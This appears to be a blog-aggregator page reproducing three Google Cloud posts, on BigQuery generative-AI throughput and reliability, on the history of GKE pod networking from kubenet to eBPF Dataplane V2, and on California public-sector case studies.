We’ve dramatically improved throughput for our users on pay-as-you-go (PayGo) pricing model: ML.GENERATE_TEXT function throughput on first-party LLMs has increased by over 100x, and ML.GENERATE_EMBEDDING throughput by over 30x. For users requiring even higher performance, we’ve also added support for Vertex AI’s Provisioned Throughput (PT).

Google embeddings LLMs
In BigQuery, each project has a fixed default quota for first-party text embedding models, including the most popular text-embedding-004/005 models. To enhance utilization and scalability, we introduced dynamic token-based batching to pack as many rows as possible into a single request, under the token constraint. Combined with other optimizations, this boosts scalability from 2.7 million to approximately 80 million rows (30x) per six-hour job (based on a default quota of 1500 QPM and 50 tokens per row dataset). You can further increase this capacity by raising your Vertex AI quota to 10,000 QPM without manual approval, which enables embedding over 500 million rows in a six-hour job.

Early access customers such as Faraday are excited for this scalability boost:

“I just did 12,678,259 embeddings in 45 min with BigQuery’s built-in Gemini. That’s about 5000 per second. Try doing that with an HTTP API!” – Seamus Abshere, Co-founder and CTO, Faraday

Google Gemini: PayGo users via dynamic shared quota
Gemini models served via Vertex AI now use dynamic shared quota (DSQ) for pay-as-you-go requests. DSQ provides access to a large, shared pool of resources, with throughput dynamically allocated based on real-time availability and demand across all customers. We rebuilt our remote inference system with adaptive traffic and producer-consumer-based error-retry mechanism. This enabled us to effectively leverage the higher amount of, but less-guaranteed, quota from DSQ. Based on internal benchmarking results, now we can process roughly 10.2 million rows in a six-hour job with gemini-2.0-flash-001, or 9.3 million rows with gemini-2.5-flash, where each row has an average of 500 input and 50 output tokens. Specific numbers depend on factors such as token count and model. See the chart below for more details.

Google Gemini: Dedicated quota via provisioned throughput
While our generative AI inference with Dynamic Shared Quota offers high throughput, it has an inherent upper bound and the potential for quota errors due to its non-guaranteed nature. To overcome these limitations, we’ve added support for Provisioned Throughput from Vertex AI. By purchasing dedicated capacity, you can help ensure consistently high throughput for demanding workloads, and get a reliable and predictable user experience. After purchasing Vertex AI provisioned throughput, you can easily leverage it in BigQuery gen AI queries by setting the “request_type” argument to “dedicated”.

2. Reliability

Facing limited and non-guaranteed generative AI inference quotas, we implemented a partial failure mode to allow queries to succeed, even if some rows fail. Via adaptive traffic control and a robust retry mechanism, across all users’ query traffic, we’ve now achieved 1) over 99.99% generative AI queries can finish without a single row failure, and 2) a row success rate of over 99.99%. This greatly enhanced BigQuery gen AI reliability.

Note that the above row-level success rate is achieved based on independent queries that invoke our generative AI functions, including both table-valued functions and row-wise scalar functions, where the error retry takes place implicitly. If you have even large workloads that see occasional errors you can use this simple SQL script or the Dataform package, which allow you to iteratively retry failed rows to get to a 100% row success rate in almost all cases.

3. Usability

We have also made Gen AI experience on BigQuery more user-friendly. We’ve streamlined complex workflows like quota management and BQ connection/permission setup, and enabled global endpoint more accessible experiences for users in all regions.

3.1 Default connection for remote model creation
Previously, setting up gen AI remote inference required a series of manual steps for users to configure a BigQuery connection and grant permissions to its service account. To solve this, we launched a new default connection. This feature automatically creates the connection and grants the necessary permissions, eliminating all manual config steps.

3.2 Global endpoint for first-party models
BigQuery gen AI inference now supports the global endpoint from Vertex AI, in addition to dozens of regional endpoints. This global endpoint provides higher availability across the world, which is particularly useful for smaller regions that may not have immediate access to the latest first-party gen AI models. Users without a data residency requirement for ML processing can use the global endpoint.

The SQL below illustrates how to create a Gemini model with the global endpoint and the BigQuery default connection.

code_block: <ListValue: [StructValue([(‘code’, “CREATE OR REPLACE MODEL `myproject.mydataset.mymodel`rnREMOTE WITH CONNECTION DEFAULTrnOPTIONS(rn endpoint = ‘https://aiplatform.googleapis.com/v1/projects/my_project/locations/global/publishers/google/models/gemini-2.5-flash’rn)”), (‘language’, ‘lang-sql’), (‘caption’, <wagtail.rich_text.RichText object at 0x7f536c58c190>)])]>

3.3 Automatic quota sync from Vertex AI
BigQuery now automatically syncs with Vertex AI to fetch your quota. Thus, if you have a higher than default quota, BigQuery uses it automatically, without any manual configuration on your part.

Get started today

Ready to build your next AI application? Start generating text, embedding, or structured tables using gen AI directly in BigQuery today. Dive into our gen AI overview page and its linked documentation for more details. If you have any questions or feedback, reach out to us at bqml-feedback@google.com.

Read More for the details.

2025 09 17

GCP – GKE network interface at 10: From core connectivity to the AI backbone

Tibor Kiss Cloud, Google Cloud gcp

It’s hard to believe it’s been over 10 years since Kubernetes first set sail, fundamentally changing how we build, deploy, and manage applications. Google Cloud was at the forefront of the Kubernetes revolution with Google Kubernetes Engine (GKE), providing a robust, scalable, and cutting-edge platform for your containerized workloads. Since then, Kubernetes has emerged as the preferred platform for workloads such as AI/ML.

Kubernetes is all about sharing machine resources among the applications and pod networking is essential for the connectivity between workloads and services using the Container Network Interface (CNI).

As we celebrate the 10th year anniversary of GKE, let’s take a look at how we’ve built out network interfaces to provide you with the performant, secure, and flexible pod networking and how we’ve evolved our networking model to support AI workloads with the Kubernetes Network Driver.

Let’s take a look back in time and see how we got there.

2015-2017: Laying the CNI foundation with kubenet

In Kubernetes’s early days, we needed to establish reliable communication between containers. For GKE, we adopted a flat model of IP addressing so that the pods and the node could communicate freely with other resources in the Virtual Private Cloud (VPC) without going through tunnels and gateways. During these formative years, GKE’s early networking models often used kubenet, a basic network plugin. Kubenet provided a straightforward way to get clusters up and running, by creating a bridge on each node and allocating IP addresses to pods from a CIDR range dedicated to that node. While Google Cloud’s network handled routing between nodes, Kubenet was responsible for connecting pods to the node’s network and enabling basic pod-to-pod communication within the node.

During this time, we also introduced route-based clusters, which were based on Google Cloud routes, part of the Andromeda engine that powers all of cloud networking. The routes feature in Andromeda played a crucial role in IP address allocation and routing within the cluster network using VPC routing rules. This required advertising the pod IP ranges between the nodes.

However, as Kubernetes adoption exploded and applications grew in scale and complexity, we faced challenges around managing IP addresses and achieving high-performance communication directly between pods across different parts of a VPC. This pushed us to develop a networking solution that was more deeply integrated with the underlying cloud network.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 to try Google Cloud networking’), (‘body’, <wagtail.rich_text.RichText object at 0x7f536c5b25e0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

2018-2019: Embracing VPC-native networking

To address these evolving needs and integrate with Google Cloud’s powerful networking capabilities, we introduced VPC-native networking for GKE. This marked a significant leap forward for how CNI operates in GKE, with alias IP ranges (the IP ranges that pods use in a node) becoming a cornerstone of the solution. VPC-native networking became the default and recommended approach, helping to increase the scale of the GKE clusters up to 15K nodes. With VPC-native clusters, the GKE CNI plugin ensures that pods receive IP addresses directly from your VPC network — they become first-class citizens on your network.

This shift brought a multitude of benefits:

Simplified IP management: GKE CNI plugin works with GKE to allocate pod IPs directly from the VPC, making them directly routable and easier to manage alongside your other cloud resources.
Enhanced security through VPC integration: Because pod IPs are VPC-native, you can apply VPC firewall rules directly to pods.
Improved performance and scalability: GKE CNI plugin facilitates direct routing within the VPC, reducing overhead and improving network throughput for pod traffic.
A foundation for advanced CNI features: VPC-native networking laid the groundwork for more sophisticated CNI functionalities that followed.

We referred to GKE’s implementation of CNI’s with VPC-native networking as GKE standard networking with dataplane v1 (DPv1). During this time, we also announced GA support for network policies with Calico. Network policies allow you to specify rules for traffic flow within your cluster, and also between pods and the outside world.

2020 and beyond: The eBPF revolution

The next major evolution in GKE’s CNI strategy arrived with the power of extended Berkeley Packet Filter or eBPF, which lets you run sandboxed programs in a privileged context. eBPF makes it safe to program the Linux kernel dynamically, opening up new possibilities for networking, security, and observability at the CNI level without having to recompile the kernel.

Recognizing this potential, Google Cloud embraced Cilium, a leading open-source CNI project built on eBPF, to create GKE Dataplane V2 (DPv2). Reaching general availability in May 2021, GKE Dataplane V2 represented a significant leap in GKE’s CNI capabilities:

Enhanced performance and scalability: By leveraging eBPF, CNI can bypass traditional kernel networking paths (like kube-proxy’s iptables-based service routing) for highly efficient packet processing for services and network policy.
Built-in network policy enforcement: GKE Dataplane V2 comes with Kubernetes network policy enforcement out-of-the-box, meaning you don’t need to install or manage a separate CNI like Calico solely for policy enforcement when using DPv2.
Enhanced observability at the data plane layer: eBPF enables deep insights into network flows directly from the kernel. GKE Dataplane V2 provides the foundation for features like network policy logging, offering visibility into CNI-level decisions.
Integrated security in the dataplane: eBPF enforces network policies efficiently and with context-awareness directly within CNI’s dataplane.
Simplified operations: As it’s a Google-managed CNI component, GKE Dataplane V2 simplifies operations for Customer workloads.
Advanced networking capabilities: Dataplane V2 unlocks a suite of powerful features that were not available or harder to achieve with Data Plane V1. These include:
IPv6 and dual-stack support: Enabling pods and services to operate with both IPv4 and IPv6 addresses.
Multi-networking: Allowing pods to have multiple network interfaces, connecting to different VPC networks or specialized network attachments, crucial for use cases like cloud native network functions (CNFs) and traffic isolation.
Service steering: Providing fine-grained control over traffic flow by directing specific traffic through a chain of service functions (like virtual firewalls or inspection points) within the cluster.
Persistent IP addresses for pods: In conjunction with the Gateway API, GKE Dataplane V2 allows pods to retain the same IP address across restarts or rescheduling, which is vital for certain stateful applications or network functions.

GKE Dataplane V2 is now the default CNI for new clusters in GKE Autopilot mode and our recommended choice for GKE Standard clusters, underscoring our commitment to providing a cutting-edge, eBPF-powered network interface.

2024: Scaling new heights for AI Training and Inference

In 2024, we marked a monumental achievement in GKE’s scalability, with the announcement that GKE supports clusters of up to 65,000 nodes. This incredible feat, a significant jump from previous limits, was made possible in large part by GKE Dataplane V2’s robust, highly optimized architecture. Powering such massive clusters, especially for demanding AI/ML training and inference workloads, requires a dataplane that is not only performant but also incredibly efficient at scale. The version of GKE Dataplane V2 underpinning these 65,000-node clusters is specifically enhanced for extreme scale and the unique performance characteristics of large-scale AI/ML applications — a testament to CNI’s ability to push the boundaries of what’s possible in cloud-native computing.

For AI/ML workloads, GKE Dataplane v2 also supports ever-increasing bandwidth requirements such as in our recently announced A4 instance. GKE Dataplane v2 also supports a variety of compute and AI/ML accelerators such the latest GB200 GPUs and Ironwood, Trillium TPUs.

For today’s AI/ML workloads networking plays critical role: AI and machine learning workloads are pushing the boundaries of computing as well as networking, presenting unique challenges for GKE networking interfaces:

Extreme throughput: Training large models requires processing massive datasets that demand upwards of terabit networking orchestrated by GKE networking interfaces.
Ultra-low latency: Distributed training relies on near-instantaneous communication between processing units.
Multi-NIC capabilities: Providing pods with multiple network interfaces, managed by GKE Dataplane V2’s multi-networking capability, can significantly boost bandwidth and allow for network segmentation.

2025 – Beyond CNI: addressing next gen Pod Networking challenges

Dynamic resource allocation (DRA) for networking

A promising Kubernetes innovation is dynamic resource allocation (DRA). Introduced to provide a more flexible and extensible way for workloads to request and consume resources beyond CPU and memory, DRA is poised to significantly impact how CNIs manage and expose network resources. While initially focused on resources like GPUs, its framework is designed for broader applicability.

In GKE, DRA (available in preview from GKE version 1.32.1-gke.1489001+) opens up possibilities for more efficient and tailored network resource management, helping demanding applications get the network performance they need using the Kubernetes Network Drivers (KNDs).

KNDs use DRA to expose Network resources at the Node level that can be referenced by all the Pod (or all containers). This is particularly relevant for AI/ML workloads, which often require very specific networking capabilities.

Looking ahead: Innovations shaping the future

The journey doesn’t stop here. With the increased adoption of accelerated workloads driving new architectures on GKE, the demands on Kubernetes networking will continue. One of the reference implementations for the Kubernetes Network Driver is the DRANET project. We look forward to continued discussions with the community and contributions to the DRANET project. We are committed to working with the community to deliver innovative customer centric solutions addressing these new challenges.

Read More for the details.

2025 09 17

GCP – How California is transforming public services with Google Cloud

Tibor Kiss Cloud, Google Cloud gcp

State and local governments across the nation face a myriad of challenges, including strained budgets, aging infrastructure, and a complex regulatory landscape. In California, these challenges are compounded by a rapidly growing population and increasing demand for public services. To address these issues, the state is turning to technology as a catalyst for change.

California, a state renowned for its innovation and technological advancements, is embracing the future of public sector services through their partnership with Google Cloud. By leveraging Google Cloud’s latest AI and machine learning, security and infrastructure technologies, we are helping agencies across the state to improve service delivery, streamline operations, bolster security, drive innovation, and ultimately improve the lives of Californians.

Streamlining health coverage: How Covered California innovates with Google Cloud

A great example of our partnership is Covered California, the state’s health insurance marketplace. By utilizing Google Cloud’s Document AI, Covered California has significantly streamlined its verification processes, enabling faster and more accurate eligibility determinations. This has led to increased efficiency and reduced administrative burdens, ultimately benefiting millions of Californians. Covered California also uses Assured Workloads to strengthen its security posture and comply with strict industry regulations, safeguarding sensitive patient data.

Covered California’s commitment to innovation extends beyond administrative efficiency, as demonstrated by their adoption of Google Security Operations, our intelligence-driven and AI-powered security operations platform.This underscores their commitment to safeguarding sensitive patient data. By leveraging advanced threat detection and response capabilities, Covered California is bolstering its security posture and ensuring the integrity of its systems.

Beyond Covered California, Google Cloud is joining forces with other innovative California organizations to leverage AI and machine learning to drive innovation and solve complex challenges.

University of California, Riverside (UCR): Expanding academic frontiers with Google Cloud’s AI tools

The University of California, Riverside (UCR) is leveraging Google Cloud’s AI and machine learning tools to revolutionize its research and academic capabilities. By utilizing Google Cloud’s Vertex AI platform, UCR researchers can accelerate the development and deployment of AI models, analyze complex datasets, and gain valuable insights. This enables UCR to explore groundbreaking research areas, such as natural language processing, computer vision, and predictive analytics. Additionally, Google Cloud’s infrastructure and storage solutions, like Google Cloud Compute Engine and Google Cloud Storage, provide the necessary foundation to support these AI initiatives.

Pushing the frontiers of science: Caltech leverages Google Cloud AI for groundbreaking research

This commitment to empowering groundbreaking research extends to the very cutting edge of scientific inquiry. Building on the foundation of providing powerful AI tools, we are also helping top-tier institutions build the next generation of research infrastructure. A powerful illustration of this is our initiative to support AI-optimized High-Performance Computing (HPC) for researchers at the California Institute of Technology (Caltech), enabling them to tackle humanity’s most complex challenges and accelerate discoveries that will benefit society for generations to come.

Advancing public service, together

The ongoing advancements in AI are creating a pivotal moment for transformation within state and local government, and Google Cloud is delivering tools designed to meet these unique needs. Agentspace empowers teams by providing a unified way to search and access vital information spread across different agency systems, streamlining complex workflows for quicker, more informed decision-making. Google Workspace revolutionizes daily operations by enabling seamless collaboration through real-time document co-editing and integrated communication tools like Google Meet and Chat. With the AI assistance of Gemini in Workspace, teams can significantly boost productivity by simplifying tasks such as drafting communications or summarizing reports, all while ensuring data is protected by enterprise-grade security. Together, these solutions help break down silos, save valuable time, and allow your teams to focus more on serving your communities effectively.

Google Public Sector is dedicated to supporting California’s ongoing digital transformation and partnering with state and local governments across the United States. Our commitment is to help agencies leverage Google’s AI, security, and infrastructure solutions to enhance service delivery, build more resilient and equitable communities, and better meet the evolving needs of the citizens they serve.

Join us to dive deeper into the technologies and strategies powering the next generation of government at the Google Public Sector Summit on October 29th in Washington, D.C. to see these innovations firsthand. This is your opportunity to connect with innovators, hear from public sector leaders, and learn how Google’s latest advancements in AI, security, and cloud can help you meet your mission. Register now to secure your spot!

Read More for the details.